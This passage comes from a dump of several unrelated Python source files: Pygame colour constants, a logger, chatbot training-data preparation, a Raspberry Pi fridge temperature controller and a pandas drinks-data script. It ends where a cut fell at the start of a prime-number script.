\"Peru\": Peru,\n \"Chocolate\": Chocolate,\n \"SaddleBrown\": SaddleBrown,\n \"Sienna\": Sienna,\n \"Brown\": Brown,\n \"Maroon\": Maroon,\n}\n\n# Green Colors:\nDarkOliveGreen = (85, 107, 47)\nOlive = (128, 128, 0)\nOliveDrab = (107, 142, 35)\nYellowGreen = (154, 205, 50)\nLimeGreen = (50, 205, 50)\nLime = (0, 255, 0)\nLawnGreen = (124, 252, 0)\nChartreuse = (127, 255, 0)\nGreenYellow = (173, 255, 47)\nSpringGreen = (0, 255, 127)\nMediumSpringGreen = (0, 250, 154)\nLightGreen = (144, 238, 144)\nPaleGreen = (152, 251, 152)\nDarkSeaGreen = (143, 188, 143)\nMediumAquamarine = (102, 205, 170)\nMediumSeaGreen = (60, 179, 113)\nSeaGreen = (46, 139, 87)\nForestGreen = (34, 139, 34)\nGreen = (0, 128, 0)\nDarkGreen = (0, 100, 0)\nlist_green = {\n \"DarkOliveGreen\": DarkOliveGreen,\n \"Olive\": Olive,\n \"OliveDrab\": OliveDrab,\n \"YellowGreen\": YellowGreen,\n \"LimeGreen\": LimeGreen,\n \"Lime\": Lime,\n \"LawnGreen\": LawnGreen,\n \"Chartreuse\": Chartreuse,\n \"GreenYellow\": GreenYellow,\n \"SpringGreen\": SpringGreen,\n \"MediumSpringGreen\": MediumSpringGreen,\n \"LightGreen\": LightGreen,\n \"PaleGreen\": PaleGreen,\n \"DarkSeaGreen\": DarkSeaGreen,\n \"MediumAquamarine\": MediumAquamarine,\n \"MediumSeaGreen\": MediumSeaGreen,\n \"SeaGreen\": SeaGreen,\n \"ForestGreen\": ForestGreen,\n \"Green\": Green,\n \"DarkGreen\": DarkGreen\n}\n\n# Cyan Colors:\nAqua = (0, 255, 255)\nCyan = (0, 255, 255)\nLightCyan = (224, 255, 255)\nPaleTurquoise = (175, 238, 238)\nAquamarine = (127, 255, 212)\nTurquoise = (64, 224, 208)\nMediumTurquoise = (72, 209, 204)\nDarkTurquoise = (0, 206, 209)\nLightSeaGreen = (32, 178, 170)\nCadetBlue = (95, 158, 160)\nDarkCyan = (0, 139, 139)\nTeal = (0, 128, 128)\nlist_cyan = {\n \"Aqua\": Aqua,\n \"Cyan\": Cyan,\n \"LightCyan\": LightCyan,\n \"PaleTurquoise\": PaleTurquoise,\n \"Aquamarine\": Aquamarine,\n \"Turquoise\": Turquoise,\n \"MediumTurquoise\": MediumTurquoise,\n \"DarkTurquoise\": DarkTurquoise,\n \"LightSeaGreen\": LightSeaGreen,\n \"CadetBlue\": CadetBlue,\n \"DarkCyan\": DarkCyan,\n \"Teal\": Teal\n}\n\n# Blue Colors:\nLightSteelBlue = (176, 196, 222)\nPowderBlue = (176, 224, 230)\nLightBlue = (173, 216, 230)\nSkyBlue = (135, 206, 235)\nLightSkyBlue = (135, 206, 250)\nDeepSkyBlue = (0, 191, 255)\nDodgerBlue = (30, 144, 255)\nCornflowerBlue = (100, 149, 237)\nSteelBlue = (70, 130, 180)\nRoyalBlue = (65, 105, 225)\nBlue = (0, 0, 255)\nMediumBlue = (0, 0, 205)\nDarkBlue = (0, 0, 139)\nNavy = (0, 0, 128)\nMidnightBlue = (25, 25, 112)\nlist_blue = {\n \"LightSteelBlue\": LightSteelBlue,\n \"PowderBlue\": PowderBlue,\n \"LightBlue\": LightBlue,\n \"SkyBlue\": SkyBlue,\n \"LightSkyBlue\": LightSkyBlue,\n \"DeepSkyBlue\": DeepSkyBlue,\n \"DodgerBlue\": DodgerBlue,\n \"CornflowerBlue\": CornflowerBlue,\n \"SteelBlue\": SteelBlue,\n \"RoyalBlue\": RoyalBlue,\n \"Blue\": Blue,\n \"MediumBlue\": MediumBlue,\n \"DarkBlue\": DarkBlue,\n \"Navy\": Navy,\n \"MidnightBlue\": MidnightBlue\n}\n\n# Purple, Violet, and Magenta Colors:\nLavender = (230, 230, 250)\nThistle = (216, 191, 216)\nPlum = (221, 160, 221)\nViolet = (238, 130, 238)\nOrchid = (218, 112, 214)\nFuchsia = (255, 0, 255)\nMagenta = (255, 0, 255)\nMediumOrchid = (186, 85, 211)\nMediumPurple = (147, 112, 219)\nBlueViolet = (138, 43, 226)\nDarkViolet = (148, 0, 211)\nDarkOrchid = (153, 50, 204)\nDarkMagenta = (139, 0, 139)\nPurple = (128, 0, 128)\nIndigo = (75, 0, 130)\nDarkSlateBlue = (72, 61, 139)\nSlateBlue = (106, 90, 205)\nMediumSlateBlue = (123, 104, 238)\nlist_purple = { # Also Magenta and Violet\n \"Lavender\": Lavender,\n \"Thistle\": Thistle,\n \"Plum\": Plum,\n \"Violet\": Violet,\n \"Orchid\": Orchid,\n \"Fuchsia\": Fuchsia,\n \"Magenta\": Magenta,\n \"MediumOrchid\": MediumOrchid,\n \"MediumPurple\": MediumPurple,\n \"BlueViolet\": BlueViolet,\n \"DarkViolet\": DarkViolet,\n \"DarkOrchid\": DarkOrchid,\n \"DarkMagenta\": DarkMagenta,\n \"Purple\": Purple,\n \"Indigo\": Indigo,\n \"DarkSlateBlue\": DarkSlateBlue,\n \"SlateBlue\": SlateBlue,\n \"MediumSlateBlue\": MediumSlateBlue,\n}\n\n# White Colors:\nWhite = (255, 255, 255)\nSnow = (255, 250, 250)\nHoneydew = (240, 255, 240)\nMintCream = (245, 255, 250)\nAzure = (240, 255, 255)\nAliceBlue = (240, 248, 255)\nGhostWhite = (248, 248, 255)\nWhiteSmoke = (245, 245, 245)\nSeashell = (255, 245, 238)\nBeige = (245, 245, 220)\nOldLace = (253, 245, 230)\nFloralWhite = (255, 250, 240)\nIvory = (255, 255, 240)\nAntiqueWhite = (250, 235, 215)\nLinen = (250, 240, 230)\nLavenderBlush = (255, 240, 245)\nMistyRose = (255, 228, 225)\nlist_white = {\n \"White\": White,\n \"Snow\": Snow,\n \"Honeydew\": Honeydew,\n \"MintCream\": MintCream,\n \"Azure\": Azure,\n \"AliceBlue\": AliceBlue,\n \"GhostWhite\": GhostWhite,\n \"WhiteSmoke\": WhiteSmoke,\n \"Seashell\": Seashell,\n \"Beige\": Beige,\n \"OldLace\": OldLace,\n \"FloralWhite\": FloralWhite,\n \"Ivory\": Ivory,\n \"AntiqueWhite\": AntiqueWhite,\n \"Linen\": Linen,\n \"LavenderBlush\": LavenderBlush,\n \"MistyRose\": MistyRose\n}\n\n# Gray and Black Colors:\nGainsboro = (220, 220, 220)\nLightGray = (211, 211, 211)\nSilver = (192, 192, 192)\nDarkGray = (169, 169, 169)\nGray = (128, 128, 128)\nDimGray = (105, 105, 105)\nLightSlateGray = (119, 136, 153)\nSlateGray = (112, 128, 144)\nDarkSlateGray = (47, 79, 79)\nBlack = (0, 0, 0)\nlist_gray = { # Also Black\n \"Gainsboro\": Gainsboro,\n \"LightGray\": LightGray,\n \"Silver\": Silver,\n \"DarkGray\": DarkGray,\n \"Gray\": Gray,\n \"DimGray\": DimGray,\n \"LightSlateGray\": LightSlateGray,\n \"SlateGray\": SlateGray,\n \"DarkSlateGray\": DarkSlateGray,\n \"Black\": Black\n}\n\nlist_colors = {}\nlist_colors.update({**list_pink, **list_red, **list_orange, **list_yellow, **list_brown,\n **list_green, **list_cyan, **list_blue, **list_purple,\n **list_white, **list_gray})\ncheck_colors = {v: k for k, v in list_colors.items()}\n","sub_path":"Python/Module – Pygame/Chapter 1/pylette_web.py","file_name":"pylette_web.py","file_ext":"py","file_size_in_byte":10783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546517728","text":"# -*- coding: utf-8 -*-\n\n# The following blog was used for the implementation of the logging in the application\n#https://realpython.com/python-logging/\nimport logging\nfrom termcolor import colored\n\nclass WorkerLogger:\n \n def __init__(self):\n logging.basicConfig(level=logging.INFO,filename='master_log.log', filemode='a', format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n \n def write(self, message, level=\"warning\"):\n \n if level == \"debug\":\n print(colored(message, 'green'))\n logging.debug(message)\n elif level == \"info\":\n print(colored(message, 'white'))\n logging.info(message)\n elif level == \"warning\":\n print(colored(message, 'yellow'))\n logging.warning(message)\n elif level == \"error\":\n print(colored(message, 'red'))\n logging.error(message)\n elif level == \"critical\":\n print(colored(message, 'red'))\n logging.critical(message)\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444692397","text":"EN_WHITELIST = '0123456789abcdefghijklmnopqrstuvwxyz ' # space is included in whitelist\nEN_BLACKLIST = '!\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~\\''\n\nFILENAME = 'data/chat.txt'\n\nlimit = {\n 'maxq' : 25,\n 'minq' : 2,\n 'maxa' : 25,\n 'mina' : 2\n }\n\nUNK = 'unk'\n# most used vocabulary\nVOCAB_SIZE = 15000\n\n\nimport random\nimport re\n\nimport nltk\nimport itertools\nfrom collections import defaultdict\n\nimport numpy as np\n\nimport pickle\n\n'''\n read twitter dataset\n return two lists(questions and answers)\n'''\n'''\n read lines from file\n return [list of lines]\n'''\ndef read_lines(filename):\n return open(filename, encoding='utf-8').read().split('\\n')[:-1]\n\n'''\n split sentences in one line\n into multiple lines\n return [list of lines]\n'''\ndef split_line(line):\n return line.split('.')\n\n'''\n remove anything that isn't in the vocabulary\n return str(pure ta/en)\n'''\ndef filter_line(line, whitelist):\n return ''.join([ ch for ch in line if ch in whitelist ])\n\n'''\n divide twitter sequences into questions and answers\n return two lists(questions and answers)\n'''\ndef divide_lines(sequences):\n ques, answ = [], []\n\n for i in range(0, len(sequences), 
2):\n ques.append(sequences[i])\n answ.append(sequences[i+1])\n\n return ques, answ\n\n'''\n read greeting dataset\n return two list(questions and answers)\n'''\ndef get_greetings():\n ques, answ = [], []\n with open('greetings.txt', 'r', encoding='utf-8') as greet:\n for row, line in enumerate(greet.readlines()):\n line = line[4:].strip('\\n')\n new_line = re.sub(\"[?,.!-]\", \"\", line)\n if row > 2:\n if row % 2 == 1:\n ques.append(new_line)\n else:\n answ.append(new_line)\n return ques, answ\n\n'''\n read history dataset\n return two list(questions and answers)\n'''\ndef get_history():\n ques, answ = [], []\n with open('history.txt', 'r', encoding='utf-8') as hist:\n for row, line in enumerate(hist.readlines()):\n line = line[4:].strip('\\n')\n new_line = re.sub(\"[?,.!-]\", \"\", line)\n if row > 2 and row < 19:\n if row % 2 == 1:\n ques.append(new_line)\n else:\n answ.append(new_line)\n return ques, answ\n\n'''\n read conversation dataset\n return two list(questions and answers)\n'''\ndef get_conversation():\n ques, answ = [], []\n with open('conversation.txt', 'r', encoding='utf-8') as conver:\n question = \"\"\n for row, line in enumerate(conver.readlines()):\n line = line.strip('\\n')\n new_line = re.sub(\"[?,.!-]\", \"\", line)\n if row > 2 and row < 30:\n if new_line[2] != ' ':\n question = new_line[2:]\n else:\n answer = new_line[3:]\n ques.append(question)\n answ.append(answer)\n return ques, answ\n\n'''\n 1. Read from cornell movie dataset 'movie-lines.txt'\n 2. Create a dictionary with ( key = line_id, value = text )\n'''\ndef get_id2line():\n lines=open('raw_data/movie_lines.txt', encoding='utf-8', errors='ignore').read().split('\\n')\n id2line = {}\n for line in lines:\n _line = line.split(' +++$+++ ')\n if len(_line) == 5:\n id2line[_line[0]] = _line[4]\n return id2line\n\n'''\n 1. Read from cornell movie dataset 'movie_conversations.txt'\n 2. Create a list of [list of line_id's]\n'''\ndef get_conversations():\n conv_lines = open('raw_data/movie_conversations.txt', encoding='utf-8', errors='ignore').read().split('\\n')\n convs = [ ]\n for line in conv_lines[:-1]:\n _line = line.split(' +++$+++ ')[-1][1:-1].replace(\"'\",\"\").replace(\" \",\"\")\n convs.append(_line.split(','))\n return convs\n\n'''\n 1. Get each conversation\n 2. Get each line from conversation\n 3. Save each conversation to file\n'''\ndef extract_conversations(convs,id2line,path=''):\n idx = 0\n for conv in convs:\n f_conv = open(path + str(idx)+'.txt', 'w')\n for line_id in conv:\n f_conv.write(id2line[line_id])\n f_conv.write('\\n')\n f_conv.close()\n idx += 1\n\n'''\n Get lists of all conversations as Questions and Answers\n 1. [questions]\n 2. [answers]\n'''\ndef gather_dataset(convs, id2line):\n questions = []; answers = []\n\n for conv in convs:\n if len(conv) %2 != 0:\n conv = conv[:-1]\n for i in range(len(conv)):\n if i%2 == 0:\n questions.append(id2line[conv[i]])\n else:\n answers.append(id2line[conv[i]])\n\n return questions, answers\n\n\n'''\n We need 4 files\n 1. train.enc : Encoder input for training\n 2. train.dec : Decoder input for training\n 3. test.enc : Encoder input for testing\n 4. 
test.dec : Decoder input for testing\n'''\ndef prepare_seq2seq_files(questions, answers, path='',TESTSET_SIZE = 30000):\n\n # open files\n train_enc = open(path + 'train.enc','w')\n train_dec = open(path + 'train.dec','w')\n test_enc = open(path + 'test.enc', 'w')\n test_dec = open(path + 'test.dec', 'w')\n\n # choose 30,000 (TESTSET_SIZE) items to put into testset\n test_ids = random.sample([i for i in range(len(questions))],TESTSET_SIZE)\n\n for i in range(len(questions)):\n if i in test_ids:\n test_enc.write(questions[i]+'\\n')\n test_dec.write(answers[i]+ '\\n' )\n else:\n train_enc.write(questions[i]+'\\n')\n train_dec.write(answers[i]+ '\\n' )\n if i%10000 == 0:\n print('\\n>> written {} lines'.format(i))\n\n # close files\n train_enc.close()\n train_dec.close()\n test_enc.close()\n test_dec.close()\n\n'''\n remove anything that isn't in the vocabulary\n return str(pure en)\n'''\ndef filter_line(line, whitelist):\n return ''.join([ ch for ch in line if ch in whitelist ])\n\n'''\n filter too long and too short sequences\n return tuple( filtered_ta, filtered_en )\n'''\ndef filter_data(qseq, aseq):\n filtered_q, filtered_a = [], []\n raw_data_len = len(qseq)\n\n assert len(qseq) == len(aseq)\n\n for i in range(raw_data_len):\n qlen, alen = len(qseq[i].split(' ')), len(aseq[i].split(' '))\n if qlen >= limit['minq'] and qlen <= limit['maxq']:\n if alen >= limit['mina'] and alen <= limit['maxa']:\n filtered_q.append(qseq[i])\n filtered_a.append(aseq[i])\n\n # print the fraction of the original data, filtered\n filt_data_len = len(filtered_q)\n filtered = int((raw_data_len - filt_data_len)*100/raw_data_len)\n print(str(filtered) + '% filtered from original data')\n\n return filtered_q, filtered_a\n\n'''\n read list of words, create index to word,\n word to index dictionaries\n return tuple( vocab->(word, count), idx2w, w2idx )\n'''\ndef index_(tokenized_sentences, vocab_size):\n # get frequency distribution\n freq_dist = nltk.FreqDist(itertools.chain(*tokenized_sentences))\n # get vocabulary of 'vocab_size' most used words\n vocab = freq_dist.most_common(vocab_size)\n # index2word\n index2word = ['_'] + [UNK] + [ x[0] for x in vocab ]\n # word2index\n word2index = dict([(w,i) for i,w in enumerate(index2word)] )\n return index2word, word2index, freq_dist\n\n'''\n filter based on number of unknowns (words not in vocabulary)\n filter out the worst sentences\n'''\ndef filter_unk(qtokenized, atokenized, w2idx):\n data_len = len(qtokenized)\n\n filtered_q, filtered_a = [], []\n\n for qline, aline in zip(qtokenized, atokenized):\n unk_count_q = len([ w for w in qline if w not in w2idx ])\n unk_count_a = len([ w for w in aline if w not in w2idx ])\n if unk_count_a <= 2:\n if unk_count_q > 0:\n if unk_count_q/len(qline) > 0.2:\n pass\n filtered_q.append(qline)\n filtered_a.append(aline)\n\n # print the fraction of the original data, filtered\n filt_data_len = len(filtered_q)\n filtered = int((data_len - filt_data_len)*100/data_len)\n print(str(filtered) + '% filtered from original data')\n\n return filtered_q, filtered_a\n\n'''\n create the final dataset :\n - convert list of items to arrays of indices\n - add zero padding\n return ( [array_en([indices]), array_ta([indices]) )\n'''\ndef zero_pad(qtokenized, atokenized, w2idx):\n # num of rows\n data_len = len(qtokenized)\n\n # numpy arrays to store indices\n idx_q = np.zeros([data_len, limit['maxq']], dtype=np.int32)\n idx_a = np.zeros([data_len, limit['maxa']], dtype=np.int32)\n\n for i in range(data_len):\n q_indices = pad_seq(qtokenized[i], 
w2idx, limit['maxq'])\n a_indices = pad_seq(atokenized[i], w2idx, limit['maxa'])\n\n #print(len(idx_q[i]), len(q_indices))\n #print(len(idx_a[i]), len(a_indices))\n idx_q[i] = np.array(q_indices)\n idx_a[i] = np.array(a_indices)\n\n return idx_q, idx_a\n\n\n'''\n replace words with indices in a sequence\n replace with unknown if word not in lookup\n return [list of indices]\n'''\ndef pad_seq(seq, lookup, maxlen):\n indices = []\n for word in seq:\n if word in lookup:\n indices.append(lookup[word])\n else:\n indices.append(lookup[UNK])\n return indices + [0]*(maxlen - len(seq))\n\n# get data from multiple datasets\ndef process_data():\n # read from greetings dataset\n print('\\n>> Read lines from greeting file')\n greetings_q, greetings_a = get_greetings()\n\n # read from history dataset\n print('\\n>> Read lines from history file')\n history_q, history_a = get_history()\n\n # read from conversation dataset\n print('\\n>> Read lines from conversation file')\n conversation_q, conversation_a = get_conversation()\n\n # read from twitter dataset\n print('\\n>> Read lines from twitter file')\n lines = read_lines(filename=FILENAME)\n\n # # change to lower case (just for en)\n # lines = [ line.lower() for line in lines ]\n\n # print('\\n:: Sample from read(p) lines')\n # print(lines[121:125])\n\n # # filter out unnecessary characters\n # print('\\n>> Filter lines')\n # lines = [ filter_line(line, EN_WHITELIST) for line in lines ]\n # print(lines[121:125])\n\n # divide lines into two lists\n print('\\n>> divide lines')\n twitter_q, twitter_a = divide_lines(lines)\n\n # read from cornell dataset\n print('\\n>> Read lines from cornell file')\n cornell_id2line = get_id2line()\n print('>> gathered id2line dictionary from cornell dataset.\\n')\n cornell_convs = get_conversations()\n print(cornell_convs[121:125])\n print('>> gathered conversations.\\n')\n cornell_q, cornell_a = gather_dataset(cornell_convs, cornell_id2line)\n\n print('Greeting dataset:')\n print(greetings_q[0])\n print(greetings_a[0])\n print(len(greetings_q), len(greetings_a))\n\n print('History dataset:')\n print(history_q[0])\n print(history_a[0])\n print(len(history_q), len(history_a))\n\n print('Conversation dataset:')\n print(conversation_q[0])\n print(conversation_a[0])\n print(len(conversation_q), len(conversation_a))\n\n print('Twitter dataset:')\n print(twitter_q[0])\n print(twitter_a[0])\n print(len(twitter_q), len(twitter_a))\n\n print('Cornell dataset:')\n print(cornell_q[0])\n print(cornell_a[0])\n print(len(cornell_q), len(cornell_a))\n\n # merge data from all datasets\n questions = greetings_q + history_q + conversation_q + cornell_q + twitter_q\n answers = greetings_a + history_a + conversation_a + cornell_a + twitter_a\n print(len(questions), len(answers))\n\n # change to lower case (just for en)\n questions = [ line.lower() for line in questions ]\n answers = [ line.lower() for line in answers ]\n\n # filter out unnecessary characters\n print('\\n>> Filter lines')\n questions = [ filter_line(line, EN_WHITELIST) for line in questions ]\n answers = [ filter_line(line, EN_WHITELIST) for line in answers ]\n\n # filter out too long or too short sequences\n print('\\n>> 2nd layer of filtering')\n qlines, alines = filter_data(questions, answers)\n\n for q,a in zip(qlines[141:145], alines[141:145]):\n print('q : [{0}]; a : [{1}]'.format(q,a))\n\n # convert list of [lines of text] into list of [list of words ]\n print('\\n>> Segment lines into words')\n qtokenized = [ [w.strip() for w in wordlist.split(' ') if w] for wordlist 
in qlines ]\n atokenized = [ [w.strip() for w in wordlist.split(' ') if w] for wordlist in alines ]\n print('\\n:: Sample from segmented list of words')\n\n for q,a in zip(qtokenized[141:145], atokenized[141:145]):\n print('q : [{0}]; a : [{1}]'.format(q,a))\n\n # indexing -> idx2w, w2idx\n print('\\n >> Index words')\n idx2w, w2idx, freq_dist = index_( qtokenized + atokenized, vocab_size=VOCAB_SIZE)\n\n # filter out sentences with too many unknowns\n print('\\n >> Filter Unknowns')\n qtokenized, atokenized = filter_unk(qtokenized, atokenized, w2idx)\n print('\\n Final dataset len : ' + str(len(qtokenized)))\n\n\n print('\\n >> Zero Padding')\n idx_q, idx_a = zero_pad(qtokenized, atokenized, w2idx)\n\n print('\\n >> Save numpy arrays to disk')\n # save them\n np.save('idx_q.npy', idx_q)\n np.save('idx_a.npy', idx_a)\n\n # let us now save the necessary dictionaries\n metadata = {\n 'w2idx' : w2idx,\n 'idx2w' : idx2w,\n 'limit' : limit,\n 'freq_dist' : freq_dist\n }\n\n # write to disk : data control dictionaries\n with open('metadata.pkl', 'wb') as f:\n pickle.dump(metadata, f)\n\n # count of unknowns\n unk_count = (idx_q == 1).sum() + (idx_a == 1).sum()\n # count of words\n word_count = (idx_q > 1).sum() + (idx_a > 1).sum()\n\n print('% unknown : {0}'.format(100 * (unk_count/word_count)))\n print('Dataset count : ' + str(idx_q.shape[0]))\n\n\nimport numpy as np\nfrom random import sample\n\n'''\n split data into train (70%), test (15%) and valid(15%)\n return tuple( (trainX, trainY), (testX,testY), (validX,validY) )\n'''\ndef split_dataset(x, y, ratio = [0.7, 0.15, 0.15] ):\n # number of examples\n data_len = len(x)\n lens = [ int(data_len*item) for item in ratio ]\n\n trainX, trainY = x[:lens[0]], y[:lens[0]]\n testX, testY = x[lens[0]:lens[0]+lens[1]], y[lens[0]:lens[0]+lens[1]]\n validX, validY = x[-lens[-1]:], y[-lens[-1]:]\n\n return (trainX,trainY), (testX,testY), (validX,validY)\n\n'''\nload data from pkl and npy files\n'''\ndef load_data(PATH=''):\n # read data control dictionaries\n with open(PATH + 'metadata.pkl', 'rb') as f:\n metadata = pickle.load(f)\n # read numpy arrays\n idx_q = np.load(PATH + 'idx_q.npy')\n idx_a = np.load(PATH + 'idx_a.npy')\n return metadata, idx_q, idx_a\n\nif __name__ == '__main__':\n process_data()","sub_path":"mysite/data/mixed/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":14847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"484894483","text":"import RPi.GPIO as GPIO\nfrom math import isclose\nfrom time import time,sleep\nfrom w1thermsensor import W1ThermSensor\n\n\nclass BeerFridge(): \n def __init__(self,\n targetTempFile: str = './Contoller/targetTemperature.txt',\n deltaTempFile = './Contoller/deltaTemp.txt',\n currentStateFile = './Contoller/currentState.txt',\n logDataFile = './Contoller/logData.csv',\n RESISTOR_OFF = GPIO.HIGH,\n RESISTOR_ON = GPIO.LOW,\n COMPRESSOR_OFF = GPIO.LOW,\n COMPRESSOR_ON = GPIO.HIGH,\n WARMING = 'warming',\n COOLING = 'cooling',\n TARGETTEMP = 'targettemp',\n DEFROSTING = 'defrosting',\n compressorPin = 14,\n resistorPin = 15,\n compressorOnTime = 3000,\n defrostingTime = 600):\n self.targetTempFile = targetTempFile\n self.deltaTempFile = deltaTempFile\n self.currentStateFile = currentStateFile\n self.logDataFile = logDataFile\n self.RESISTOR_OFF = RESISTOR_OFF\n self.RESISTOR_ON = RESISTOR_ON\n self.COMPRESSOR_ON = COMPRESSOR_ON\n self.COMPRESSOR_OFF = COMPRESSOR_OFF\n self.WARMING = WARMING\n self.COOLING = COOLING\n self.TARGETTEMP = 
TARGETTEMP\n self.DEFROSTING = DEFROSTING\n self.compressor = compressorPin\n self.resistor = resistorPin\n self.tempList = []\n self.targetTemp = self.deltaTemp = self.currentTemp = 0\n self.timeCooler = self.timeResistor = 0\n self.currentState = ''\n self.tempController = W1ThermSensor()\n self.tempControllerType = 'W1'\n self.compressorState = COMPRESSOR_OFF\n self.resistorState = RESISTOR_OFF\n self.compressorOnTime = compressorOnTime\n self.defrostingTime = defrostingTime\n self.SetDefaultState()\n\n def GetCurrentStates(self):\n self.SetCurrentTemp()\n\n with open(self.targetTempFile,'r') as fin:\n self.targetTemp = float(fin.read())\n with open(self.deltaTempFile,'r') as fin:\n self.deltaTemp = float(fin.read())\n with open(self.currentStateFile,'r') as fin:\n self.currentState = fin.read()\n\n def GetTemp(self):\n return self.tempController.get_temperature()\n\n def SetCurrentTemp(self):\n self.tempList.append(self.GetTemp())\n self.tempList = self.tempList[1:]\n print(self.tempList)\n self.currentTemp = round(sum(self.tempList)/len(self.tempList),2)\n\n\n def SetDefaultState(self):\n for _ in range(5):\n self.tempList.append(self.GetTemp())\n sleep(.1)\n print(self.tempList)\n self.SetCurrentTemp()\n\n GPIO.output(self.resistor,self.RESISTOR_OFF)\n with open(self.targetTempFile,'r') as fin:\n self.targetTemp = fin.read()\n with open(self.currentStateFile,'w') as fout:\n self.currState = self.WARMING if float(self.targetTemp) > float(self.currentTemp) else self.COOLING\n if self.currState == self.WARMING:\n self.timeCooler = time()\n fout.write(self.currState)\n print(f'Setting first state as {self.currState}')\n\n def SetCurrentState(self,newState):\n self.currentState = newState\n with open(self.currentStateFile,'w') as fout:\n fout.write(newState)\n \n def DefineNextStage(self):\n\n # Am I defrosting?\n if self.currentState == self.DEFROSTING:\n currTime = time()\n if currTime - self.timeResistor >= self.defrostingTime:\n self.resistorState = self.RESISTOR_OFF\n GPIO.output(self.resistor,self.RESISTOR_OFF)\n self.timeResistor = 0\n self.SetCurrentState(self.COOLING)\n\n # Is around the target temp?!\n elif isclose(self.targetTemp,self.currentTemp,abs_tol=0.01):\n self.compressorState = self.COMPRESSOR_OFF\n self.timeCooler = 0\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n # Current temperature is Higher than target tem?\n elif self.currentTemp > self.targetTemp:\n\n if self.currentState == self.WARMING:\n self.compressorState = self.COMPRESSOR_OFF\n self.timeCooler = 0\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n\n elif self.currentState == self.COOLING:\n self.compressorState = self.COMPRESSOR_ON\n currTime = time()\n\n if self.timeCooler == 0:\n self.timeCooler = currTime\n\n if currTime - self.timeCooler >= self.compressorOnTime:\n GPIO.output(self.compressor,self.COMPRESSOR_OFF)\n #self.compressorState = self.OFF\n self.SetCurrentState(self.DEFROSTING)\n GPIO.output(self.resistor,self.RESISTOR_ON)\n self.resistorState = self.RESISTOR_ON\n self.timeResistor = currTime\n self.timeCooler = 0\n\n else:\n GPIO.output(self.compressor, self.COMPRESSOR_ON)\n self.SetCurrentState(self.COOLING)\n\n elif self.currentState == self.TARGETTEMP:\n\n if self.currentTemp >= self.targetTemp + self.deltaTemp:\n self.compressorState = self.COMPRESSOR_ON\n GPIO.output(self.compressor, self.COMPRESSOR_ON)\n self.SetCurrentState(self.COOLING)\n\n else:\n self.compressorState = self.COMPRESSOR_OFF\n 
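# --- Illustrative aside (not part of the dataset records above/below) ---
# BeerFridge.SetCurrentTemp smooths sensor noise by averaging a short
# sliding window of readings. A minimal, hardware-free sketch of that idea;
# the window size of 5 mirrors tempList, and read_fn stands in for the
# W1ThermSensor call (both are assumptions for illustration):
from collections import deque
import random

class SmoothedSensor:
    def __init__(self, read_fn, window=5):
        self.read_fn = read_fn              # callable returning one raw reading
        self.window = deque(maxlen=window)  # oldest reading drops out automatically

    def current(self):
        self.window.append(self.read_fn())
        return round(sum(self.window) / len(self.window), 2)

if __name__ == '__main__':
    sensor = SmoothedSensor(lambda: 4.0 + random.uniform(-0.3, 0.3))
    for _ in range(10):
        print(sensor.current())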
GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n\n else: \n print('What state is it?!?!')\n\n # Ok, current temperature is below target temp\n else:\n if self.currentState == self.WARMING:\n self.compressorState = self.COMPRESSOR_OFF\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.WARMING)\n elif self.currentState == self.COOLING:\n self.compressorState = self.COMPRESSOR_OFF\n self.SetCurrentState(self.WARMING)\n self.resistorState = self.RESISTOR_OFF\n self.timeResistor = time()\n self.timeCooler = 0\n\n elif self.currentState == self.TARGETTEMP:\n\n if self.currentTemp >= self.targetTemp - self.deltaTemp:\n self.compressorState = self.COMPRESSOR_OFF\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n\n else:\n self.compressorState = self.COMPRESSOR_OFF\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.WARMING)\n\n else: \n print('What state is it?!?!')\n \n def PrintInfo(self,log=True):\n lineBreak = '\\n\\t'\n compressorState = 'OFF' if self.compressorState == self.COMPRESSOR_OFF else 'ON'\n resistorState = 'OFF' if self.resistorState == self.RESISTOR_OFF else 'ON'\n print(f'Current stage:{lineBreak}Temp: {round(self.currentTemp,2)}{lineBreak}Target: {self.targetTemp}{lineBreak}Current State: {self.currentState}{lineBreak}Compressor: {compressorState}{lineBreak}Resistor: {resistorState}')\n if log:\n with open(self.logDataFile,'a') as fLog:\n fLog.write(f'{round(self.currentTemp,2)},{self.targetTemp},{self.currentState},{compressorState},{resistorState},{time()}\\n')\n","sub_path":"Python Code/BeerFridge/BeerFridge.py","file_name":"BeerFridge.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641517433","text":"#!/usr/bin/python3\n\n\"\"\"\n World alcohol data\n\n\"\"\"\n\nimport pandas as pd\n\n\ndef main():\n \"\"\"\n Main Function\n \"\"\"\n\n link = \"https://raw.githubusercontent.com/sinanuozdemir/principles_of_data_science\" \\\n \"/master/data/chapter_2/drinks.csv\"\n\n drinks = pd.read_csv(link)\n # printing first 5 rows of csv\n print(drinks.head())\n\n # categorical column\n print(\"Continent description\", drinks['continent'].describe())\n\n # quantitative column\n print(\"Beer servings description\", drinks['beer_servings'].describe())\n","sub_path":"Types Of Data/World_alcohol_data.py","file_name":"World_alcohol_data.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272069714","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"ppcsv.py Finds Primes Really Fast and stores them in primelist.csv.\"\"\"\r\nimport sys\r\nimport time\r\nimport fastcsv\r\nfrom pyprimesieve import 